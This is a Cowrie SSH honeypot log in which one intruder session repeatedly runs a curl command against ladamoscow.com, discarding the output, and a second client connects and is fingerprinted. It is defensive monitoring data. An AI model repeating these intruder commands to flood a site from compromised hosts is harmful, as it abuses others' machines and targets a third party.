{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.912418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.949759Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.950450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.959514Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:54.987608Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:54.988356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.028550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.029345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.038427Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.067499Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.068291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.105722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.106460Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.143553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.144388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.182153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.182987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.219961Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.220729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.271418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.272231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.280090Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.309292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.309868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.347904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.348510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.372239Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.385888Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.387063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.395242Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.425786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.426480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.465274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.465955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.474097Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.503914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.504899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.543101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.543885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.572841Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.584513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.585226Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.607571Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.624188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.624939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.681773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.682588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.724421Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.725179Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.763865Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.764692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.807244Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.807997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.846634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.847176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.885181Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.886022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.924093Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.925000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:55.961966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:55.962770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.000050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.001086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.038619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.039544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.089198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.090310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.129205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.129962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.169475Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.170168Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.206304Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.209430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.209970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.238972Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.247407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.248203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"23.227.147.163","src_port":44776,"dst_ip":"1.2.3.4","dst_port":22,"session":"b289b0dc543c","protocol":"ssh","message":"New connection: 23.227.147.163:44776 (1.2.3.4:22) [session: b289b0dc543c]","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.258625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.259205Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.284763Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.285450Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.326443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.327005Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.353122Z","src_ip":"23.227.147.163","session":"b289b0dc543c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.363806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.364653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.371566Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.401617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.402422Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.430034Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.441173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.441967Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.489158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.490285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.502825Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.527471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.528309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.565697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.566485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.574461Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.602986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.603875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.639633Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.641713Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.642747Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.679872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.680681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.703606Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.718576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:56.719327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:56.757469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
